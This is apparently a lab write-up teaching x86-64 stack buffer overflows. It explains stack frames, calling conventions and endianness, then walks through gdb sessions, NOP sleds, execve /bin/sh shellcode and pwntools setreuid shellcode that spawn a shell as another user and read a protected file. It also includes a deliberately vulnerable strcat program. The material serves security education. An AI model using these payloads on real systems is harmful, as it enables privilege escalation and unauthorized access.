Documentation
Process Layout
When a program runs on a machine, the computer runs the program as a process. Current computer architecture allows multiple processes to run concurrently (at the same time on one computer). While these processes may appear to run at the same time, the computer actually switches between them very quickly, which makes it look like they are running simultaneously. Switching between processes is called a context switch. Since each process may need different information to run (e.g. the current instruction to execute), the operating system has to keep track of all the information in a process. The memory in the process is organised sequentially and has the following layout:
- The user stack contains the information required to run the program. This includes the current program counter, saved registers and more. The section after the user stack is unused memory, which is used when the stack grows (downwards).
- Shared library regions are used to statically or dynamically link libraries that are used by the program.
- The heap grows and shrinks dynamically depending on whether the program dynamically allocates memory. Notice there is an unassigned section above the heap, which is used if the heap grows.
- The program code and data section stores the program executable and initialised variables.
x86-64 Procedures
A program usually consists of multiple functions, and there needs to be a way of tracking which function has been called and which data is passed from one function to another. The stack is a region of contiguous memory addresses, and it is used to make it easy to transfer control and data between functions. The top of the stack is at the lowest memory address and the stack grows towards lower memory addresses. The most common operations of the stack are:
- Pushing: used to add data onto the stack
- Popping: used to remove data from the stack
push var
This is the assembly instruction to push a value onto the stack. It does the following:
- Uses var or the value stored at the memory location of var
- Decrements the stack pointer (known as rsp) by 8
- Writes the above value to the new location of rsp, which is now the top of the stack
pop var
This is the assembly instruction to read a value and pop it off the stack. It does the following:
- Reads the value at the address given by the stack pointer (rsp)
- Increments the stack pointer by 8
- Stores the value that was read from rsp into var
[Figure: the stack top (memory location 0x0), where rsp points]
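To make the pointer arithmetic concrete, here is a minimal Python 3 sketch of push and pop. It is only a toy model: the ToyStack class, the dictionary used as memory and the starting address are all assumptions made for illustration, not part of any real tool.

```python
# Toy model of an x86-64 stack: memory is a dict keyed by address,
# and rsp moves down by 8 on push and up by 8 on pop.

class ToyStack:
    def __init__(self, top=0x7FFFFFFFE000):
        # 'top' is an arbitrary, hypothetical starting address.
        self.rsp = top
        self.memory = {}

    def push(self, value):
        self.rsp -= 8                  # decrement the stack pointer first
        self.memory[self.rsp] = value  # then write at the new top of stack

    def pop(self):
        value = self.memory.pop(self.rsp)  # read the value at rsp
        self.rsp += 8                      # then increment the stack pointer
        return value


stack = ToyStack()
start = stack.rsp
stack.push(4)
stack.push(5)
print(hex(start - stack.rsp))    # 0x10, two pushes moved rsp down by 16 bytes
print(stack.pop(), stack.pop())  # 5 4, values come back in reverse order
```

After both pops, rsp is back at its starting value, which is why pushes and pops have to be balanced inside a function.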
Each compiled program may include multiple functions, where each function would need to store local variables, arguments passed to the function and more. To make this easy to manage, each function has its own separate stack frame, where each new stack frame is allocated when a function is called, and deallocated when the function is complete.
This is easily explained using an example. Look at the two functions:
int add(int a, int b){
    int new = a + b;
    return new;
}
int calc(int a, int b){
    int final = add(a, b);
    return final;
}
calc(4, 5)
Procedures Continued
The explanation assumes that the current point of execution is inside the calc function. In this case calc is known as the caller function and add is known as the callee function. The following presents the assembly code inside the calc function.
The add function is invoked using the call instruction in assembly, in this case callq sym.add. The call instruction can either take a label as an argument (e.g. a function name), or it can take a memory address as an offset to the location of the start of the function in the form of call *value. Once the add function is invoked (and after it is completed), the program needs to know at what point to continue. To do this, the computer pushes the address of the next instruction onto the stack, in this case the address of the instruction on the line that contains movl %eax, local_4h. After this, the program allocates a stack frame for the new function, changes the instruction pointer to the first instruction in the function, changes the stack pointer (rsp) to the top of the stack, and changes the frame pointer (rbp) to point to the start of the new frame.
Once the function has finished executing, it executes the return instruction (retq). This instruction pops the return address off the stack, deallocates the stack frame for the add function, changes the instruction pointer to the value of the return address, changes the stack pointer (rsp) to the top of the stack and changes the frame pointer (rbp) to the stack frame of calc.
Now that we’ve understood how control is transferred through functions, let’s look at how data is transferred.
In the above example, we saw that functions take arguments. The calc function takes 2 arguments (a and b). Up to 6 arguments for functions can be stored in the following registers:
- rdi
- rsi
- rdx
- rcx
- r8
- r9
Note: rax is a special register that stores the return value of a function (if any).
If a function has any more arguments, these arguments are stored on the stack.
We can now see that a caller function may save values in registers, but what happens if a callee function also wants to use those registers? To ensure the values are not overwritten, the callee function first saves the values of the registers on its stack frame, uses the registers and then loads the values back into the registers. The caller function can also save values on its own stack frame to prevent the values from being overwritten. Here are some rules around which registers are caller and callee saved:
- rax is caller saved
- rdi, rsi, rdx, rcx, r8 and r9 are caller saved (and they are usually arguments for functions)
- r10, r11 are caller saved
- rbx, r12, r13, r14 are callee saved
- rbp is also callee saved(and can be optionally used as a frame pointer)
- rsp is callee saved
So far, this is a more thorough example of the run time stack:
Endianness
In the above programs, you can see that the binary information is represented in hexadecimal format. Different architectures actually store the same hexadecimal number in different byte orders, and this is what is referred to as endianness. Let’s take the value 0x12345678 as an example. Here the least significant byte is the rightmost one (78) while the most significant byte is the leftmost one (12).
Little Endian is where the value is arranged from the least significant byte to the most significant byte:
Big Endian is where the value is arranged from the most significant byte to the least significant byte.
Here, each “value” requires at least a byte to represent, as part of a multi-byte object.
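As a quick check of the two byte orders, here is a short Python 3 sketch using the standard struct module on the same value, 0x12345678. The variable names are only illustrative.

```python
import struct

value = 0x12345678

little = struct.pack("<I", value)  # least significant byte first
big = struct.pack(">I", value)     # most significant byte first

print(little.hex())  # 78563412
print(big.hex())     # 12345678
```

x86-64 is little endian, which is why addresses in the payloads later on are written with their bytes reversed.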
Overwriting Variables
Now that we’ve looked at all the background information, let’s explore how the overflows actually work. If you take a look at the overflow-1 folder, you’ll notice some C code with a binary program. Your goal is to change the value of the integer variable.
From the C code you can see that the integer variable and character buffer are declared next to each other. Since memory is allocated in contiguous bytes, you can assume that they also sit next to each other on the stack.
Note: this may not always be the case. Depending on how the compiler and stack are configured, variables may need to be aligned to particular size boundaries (e.g. 8 bytes, 16 bytes) to make memory allocation/deallocation easier. So if a 12 byte array is allocated where the stack is aligned to 16 bytes, this is what the memory would look like:
The compiler would automatically add 4 bytes to ensure that the size of the variable aligns with the stack size. From the image of the stack above, we can assume that the stack frame for the main function looks like this:
Even though the stack grows downwards, when data is copied/written into the buffer, it is copied from lower to higher addresses. Depending on how data is entered into the buffer, this means that it's possible to overwrite the integer variable. From the C code, you can see that the gets function is used to read data into the buffer from standard input. The gets function is dangerous because it has no length check. This means that you can enter more than 14 bytes of data, which would then overwrite the integer variable.
Try running the C program in this folder to overwrite the above variable!
Because the buffer has a size of 14, we can exploit the vulnerability with:
python -c "print('a' * 14 + 'toto')" | ./program
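Here is a minimal Python 3 simulation of why those 4 extra bytes land in the integer. It assumes the 4-byte integer sits directly above the 14-byte buffer with no padding in between, and the starting value of 0 is made up for the sketch. The names frame and unchecked_copy are hypothetical.

```python
import struct

BUFFER_SIZE = 14  # size of the character buffer, as stated above

# Model the frame as 14 buffer bytes immediately followed by a 4-byte int.
# The initial value 0 is a hypothetical choice for this sketch.
frame = bytearray(BUFFER_SIZE) + bytearray(struct.pack("<i", 0))

def unchecked_copy(frame, data):
    """Copy data upwards from the start of the buffer with no length check, like gets."""
    frame[0:len(data)] = data

unchecked_copy(frame, b"a" * 14 + b"toto")

variable = struct.unpack_from("<i", frame, BUFFER_SIZE)[0]
print(hex(variable))  # 0x6f746f74, the bytes of "toto" read as a little-endian int
```

The first 14 bytes fill the buffer, and everything after that spills into whatever is stored next.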
Overwriting Function Pointers
For this example, look at the overflow-2 folder. Inside this folder, you’ll notice the following C code.
To begin, we run the program through gdb. We can see that with 15 * A the return address is overwritten with one 41, which corresponds to one A:
[user1@ip-10-10-50-167 overflow-2]$ gdb func-pointer
GNU gdb (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from func-pointer...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-2/func-pointer
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
AAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()
Then, by entering 20 * A, we can see that the return address is filled with several 41 bytes. We can't add more A characters, because by adding one more we overwrite too far.
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-2/func-pointer
AAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-2/func-pointer
AAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x00000000004005da in main ()
(gdb) print special
$1 = {<text variable, no debug info>} 0x400567 <special>
Finally, we add the address of the special function (in little-endian byte order) after the 14 a characters.
[user1@ip-10-10-50-167 overflow-2]$ python -c "print('a' * 14 + '\x67\x05\x40')" | ./func-pointer
this is the special function
you did this, friend!
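The bytes '\x67\x05\x40' in that command are simply the address 0x400567 in little-endian order. Here is a short Python 3 sketch of the conversion. Dropping the trailing zero bytes assumes the upper bytes of the pointer being overwritten are already zero, which matches the addresses gdb shows for this binary but is still an assumption.

```python
import struct

special_addr = 0x400567  # address printed by gdb for the special function

# Pack as a 64-bit little-endian pointer, then drop the trailing zero bytes
# (assumed to be already present in the pointer that gets overwritten).
packed = struct.pack("<Q", special_addr)
print(packed.hex())  # 6705400000000000

tail = packed.rstrip(b"\x00")
payload = b"a" * 14 + tail
print(len(payload))  # 17
```

Note that the transcripts in this write-up use Python 2, where print writes raw bytes. In Python 3 you would write the payload with sys.stdout.buffer.write(payload) instead of print.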
Buffer Overflows
For this example, look at the overflow-3 folder. Inside this folder, you’ll find the following C code.
This example will cover some of the more interesting and useful things you can do with a buffer overflow. In the previous examples, we’ve seen that when a program takes user-controlled input, it may not check the length, and thus a malicious user could overwrite values and actually change variables.
In this example, in the copy_arg function we can see that the strcpy function is copying input from a string (argv[1], which is a command line argument) to a buffer of length 140 bytes. By its nature, strcpy does not check the length of the data being copied, so here it’s also possible to overflow the buffer, and we can do something more malicious.
Let’s take a look at what the stack will look like for the copy_arg function(this stack excludes the stack frame for the strcpy function):
Earlier, we saw that when a function (in this case main) calls another function (in this case copy_arg), it needs to add the return address on the stack so the callee function (copy_arg) knows where to transfer control to once it has finished executing. From the stack above, we know that data will be copied upwards from buffer[0] to buffer[140]. Since we can overflow the buffer, it also follows that we can overwrite the return address with our own value. We can control where the function returns and change the flow of execution of a program (very cool, right?)
Now that we know we can control the flow of execution by directing the return address to some memory address, how do we actually do something useful with this? This is where shellcode comes in; shellcode quite literally is code that will open up a shell. More specifically, it is binary instructions that can be executed. Since shellcode is just machine code (in the form of binary instructions), you can usually start off by writing a C program to do what you want, compile it into assembly and extract the hex characters (alternatively it would involve writing your own assembly). For now we’ll use this shellcode that opens up a basic shell:
\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05
So let’s look at actually executing this shellcode. The basic idea is that we need to point the overwritten return address to the shellcode, but where do we actually store the shellcode and what address do we point it at? Why don’t we store the shellcode in the buffer? Because we know the address at the beginning of the buffer, we can just overwrite the return address to point to the start of the buffer. Here’s the general process so far:
- Find out the address of the start of the buffer and the start address of the return address
- Calculate the difference between these addresses so you know how much data to enter to overflow
- Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address
In theory, this looks like it would work quite well. However, memory addresses may not be the same on different systems, or even on the same computer when the program is recompiled. So we can make this more flexible using a NOP instruction. A NOP instruction is a no-operation instruction: when the system processes this instruction, it does nothing and carries on execution. A NOP instruction is represented using \x90. Putting NOPs in the payload means an attacker can jump anywhere in the memory region that contains NOPs and eventually reach the intended instructions. This is what an injection vector would look like:
You’ve probably noticed that shellcode, memory addresses and NOP sleds are usually in hex code. To make it easy to pass the payload to an input program, you can use python:
python -c "print('\x90' * 30 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + '\x41' * 60 + '\x60\x20\xa2\xf7\xff\x7f')" | ./program_name
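The layout used in that one-liner (NOP sled, shellcode, filler, return address) can be sketched as a small Python 3 helper. The function build_payload and the placeholder bytes are hypothetical and only illustrate how the four parts add up; they are not working shellcode or a real address.

```python
def build_payload(shellcode, return_address, total_length, sled_length):
    """Lay out: NOP sled + shellcode + filler + return address bytes."""
    filler_length = total_length - sled_length - len(shellcode) - len(return_address)
    if filler_length < 0:
        raise ValueError("sled and shellcode do not fit in the payload")
    return b"\x90" * sled_length + shellcode + b"A" * filler_length + return_address


# Placeholder values for illustration only; none of these come from a real target.
fake_shellcode = b"\xcc" * 30  # stand-in bytes, not working shellcode
fake_address = b"\x42" * 6     # stand-in for a 6-byte address
payload = build_payload(fake_shellcode, fake_address, total_length=126, sled_length=30)

print(len(payload))                    # 126
print(payload.endswith(fake_address))  # True
```

With a 30-byte sled, 30 bytes of shellcode and a 6-byte address, the helper works out the same 60 filler bytes that the one-liner above hard-codes.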
First, we have to find the number of characters to pass in order to overflow the return address:
[user1@ip-10-10-144-140 overflow-3]$ gdb --args buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Reading symbols from buffer-overflow...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-3/buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()
We can see that with 153 * A we can overflow the return address.
Now, we determine the maximum size of the payload:
[user1@ip-10-10-144-140 overflow-3]$ gdb --args buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Reading symbols from buffer-overflow...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-3/buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400563 in copy_arg ()
With 159 * A we have gone too far, so the maximum size is 158.
So let's craft a payload:
[user1@ip-10-10-144-140 overflow-3]$ python
Python 2.7.16 (default, Jul 19 2019, 23:05:17)
[GCC 7.3.1 20180712 (Red Hat 7.3.1-6)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> shellcode = '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'
>>> len(shellcode)
30
>>> payload = '\x90' * 90 + shellcode + 'A' * 32 + 'B' * 6
>>> len(payload)
158
The memory address is 6 bytes long, so we used 6 * B in order to recognize them in the return address:
(gdb) run $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + 'B' * 6)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + 'B' * 6)")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������H�/bin/shH�H�QH�<$H1Ұ;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB
Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()
That's a success! So now we need to find the address of the shellcode. To do so, we print the memory where the shellcode is located. We set the number of memory units to print to 100 and we start at rsp - 158, because rsp contains the stack pointer and we know that the payload has a size of 158. The memory printed should begin with NOPs:
(gdb) x/100x $rsp-158
0x7fffffffe252: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe262: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe272: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe282: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe292: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe2a2: 0x90909090 0x90909090 0x622fb948 0x732f6e69
0x7fffffffe2b2: 0xc1481168 0xc14808e1 0x485108e9 0x48243c8d
0x7fffffffe2c2: 0x3bb0d231 0x4141050f 0x41414141 0x41414141
0x7fffffffe2d2: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe2e2: 0x41414141 0x42424141 0x42424242 0xe3e80000
0x7fffffffe2f2: 0x7fffffff 0x00000000 0x00020000 0x05a00000
0x7fffffffe302: 0x00000040 0x302a0000 0x7ffff7a4 0x00000000
0x7fffffffe312: 0x00000000 0xe3e80000 0x7fffffff 0x00000000
0x7fffffffe322: 0x00020004 0x05640000 0x00000040 0x00000000
0x7fffffffe332: 0x00000000 0x41590000 0x81598c13 0x045071f6
0x7fffffffe342: 0x00000040 0xe3e00000 0x7fffffff 0x00000000
0x7fffffffe352: 0x00000000 0x00000000 0x00000000 0x41590000
0x7fffffffe362: 0x7e264173 0x41598e09 0x6e91d897 0x00008e09
0x7fffffffe372: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe382: 0x00000000 0xe4000000 0x7fffffff 0xe1300000
0x7fffffffe392: 0x7ffff7ff 0x76560000 0x7ffff7de 0x00000000
0x7fffffffe3a2: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe3b2: 0x00000000 0x04500000 0x00000040 0xe3e00000
0x7fffffffe3c2: 0x7fffffff 0x047a0000 0x00000040 0xe3d80000
0x7fffffffe3d2: 0x7fffffff 0xdf800000 0x7ffff7ff 0x00020000
As you can see, the shellcode begins between 0x7fffffffe2a2 and 0x7fffffffe2b2. So to be sure of the address, we realign the pointer:
(gdb) x/100x $rsp-160
0x7fffffffe248: 0xffffe648 0x00007fff 0x90909090 0x90909090
0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe298: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe2a8: 0xb9489090 0x6e69622f 0x1168732f 0x08e1c148
0x7fffffffe2b8: 0x08e9c148 0x3c8d4851 0xd2314824 0x050f3bb0
0x7fffffffe2c8: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe2d8: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe2e8: 0xffffe2a8 0x007fff66 0xffffe3e8 0x00007fff
0x7fffffffe2f8: 0x00000000 0x00000002 0x004005a0 0x00000000
0x7fffffffe308: 0xf7a4302a 0x00007fff 0x00000000 0x00000000
0x7fffffffe318: 0xffffe3e8 0x00007fff 0x00040000 0x00000002
0x7fffffffe328: 0x00400564 0x00000000 0x00000000 0x00000000
0x7fffffffe338: 0xf7bfdd97 0x25c4f6f9 0x00400450 0x00000000
0x7fffffffe348: 0xffffe3e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe358: 0x00000000 0x00000000 0x3adfdd97 0xda3b0986
0x7fffffffe368: 0xa33bdd97 0xda3b1931 0x00000000 0x00000000
0x7fffffffe378: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe388: 0xffffe400 0x00007fff 0xf7ffe130 0x00007fff
0x7fffffffe398: 0xf7de7656 0x00007fff 0x00000000 0x00000000
0x7fffffffe3a8: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe3b8: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
0x7fffffffe3c8: 0x0040047a 0x00000000 0xffffe3d8 0x00007fff
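As a sanity check on the realigned dump, here is a short Python 3 calculation of where the NOP sled and the shellcode sit, and whether the address 0x7fffffffe298 used in the next step falls inside the sled. The starting offset is read off the first row of the dump, so treat it as an assumption tied to this particular run.

```python
SLED_LENGTH = 90

# From the realigned dump: the row at 0x7fffffffe248 holds 8 bytes of other
# data before the first 0x90, so the sled starts 8 bytes into that row.
sled_start = 0x7FFFFFFFE248 + 8
shellcode_start = sled_start + SLED_LENGTH

candidate = 0x7FFFFFFFE298  # the return address chosen in the text

print(hex(sled_start))       # 0x7fffffffe250
print(hex(shellcode_start))  # 0x7fffffffe2aa
print(sled_start <= candidate < shellcode_start)  # True
```

Any address inside the sled works, since execution slides through the NOPs until it reaches the shellcode.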
We can add the address 0x7fffffffe298 at the end of our payload:
(gdb) run $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + '\x98\xe2\xff\xff\xff\x7f')")
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + '\x98\xe2\xff\xff\xff\x7f')")
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
������������������������������������������������������������������������������������������H�/bin/shH�H�QH�<$H1Ұ;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe2c8 in ?? ()
After many failed attempts, I've found a shellcode here.
So let's update the payload, and this works:
(gdb) run $(python -c "print('\x90' * 90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 22 + '\x98\xe2\xff\xff\xff\x7f')")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 22 + '\x98\xe2\xff\xff\xff\x7f')")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAAAAA�����
process 5242 is executing new program: /usr/bin/bash
sh-4.2$ id
Detaching after fork from child process 5246.
uid=1001(user1) gid=1001(user1) groups=1001(user1)
sh-4.2$ ls -la
Detaching after fork from child process 5247.
total 20
drwxrwxr-x 2 user1 user1 72 Sep 2 2019 .
drwx------ 7 user1 user1 169 Nov 27 2019 ..
-rwsrwxr-x 1 user2 user2 8264 Sep 2 2019 buffer-overflow
-rw-rw-r-- 1 user1 user1 285 Sep 2 2019 buffer-overflow.c
-rw------- 1 user2 user2 22 Sep 2 2019 secret.txt
sh-4.2$ cat secret.txt
Detaching after fork from child process 5248.
cat: secret.txt: Permission denied
But we get a permission denied error...
So let's use pwntools to craft shellcode that sets the reuid to 1002 (the id of user2):
root@bastion:~# pwn shellcraft -f d amd64.linux.setreuid 1002
\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05
>>> payload = '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05'
>>> len(payload)
14
We add the shellcode and adjust the number of filler characters accordingly:
[user1@ip-10-10-144-140 overflow-3]$ ./buffer-overflow $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 8 + '\x98\xe2\xff\xff\xff\x7f')")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAA�����
sh-4.2$ id
uid=1002(user2) gid=1001(user1) groups=1001(user1)
sh-4.2$ cat secret.txt
omgyoudidthissocool!!
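The filler counts used in the two payloads above (22 and then 8) follow from keeping the total at 158 bytes. Here is a small Python 3 sketch of that arithmetic. The helper name filler is hypothetical, and the 40-byte length of the second shellcode is counted from the escape sequences in the commands above.

```python
TOTAL = 158        # maximum payload size found earlier
SLED = 90          # number of NOP bytes
ADDRESS = 6        # bytes used for the return address
SHELL_LEN = 40     # length of the execve shellcode, counted from the command above
SETREUID_LEN = 14  # length reported by len(payload) above

def filler(total, *parts):
    """Number of filler bytes left once the other parts are placed."""
    return total - sum(parts)

print(filler(TOTAL, SLED, SHELL_LEN, ADDRESS))                # 22
print(filler(TOTAL, SLED, SETREUID_LEN, SHELL_LEN, ADDRESS))  # 8
```

Adding the 14-byte setreuid shellcode therefore costs exactly 14 filler characters, which is why 'A' * 22 becomes 'A' * 8.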
Buffer Overflows 2
Try to use your newly learnt buffer overflow techniques for this binary file:
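#include <stdio.h>
#include <stdlib.h>
#include <string.h>  /* needed for strcat */

void concat_arg(char *string)
{
    char buffer[154] = "doggo";
    /* Intentionally vulnerable: strcat does not check the length of string. */
    strcat(buffer, string);
    printf("new word is %s\n", buffer);
}

int main(int argc, char **argv)
{
    concat_arg(argv[1]);
    return 0;
}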
First, we found that the return address is overwritten from the 164th character through the 169th:
(gdb) run $(python -c "print('A' * 164)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A' * 164)")
new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()
(gdb) run $(python -c "print('A' * 169)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A' * 169)")
new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
So let's craft a payload like previously and adapt it to this binary:
(gdb) run $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + 'B' * 6)")
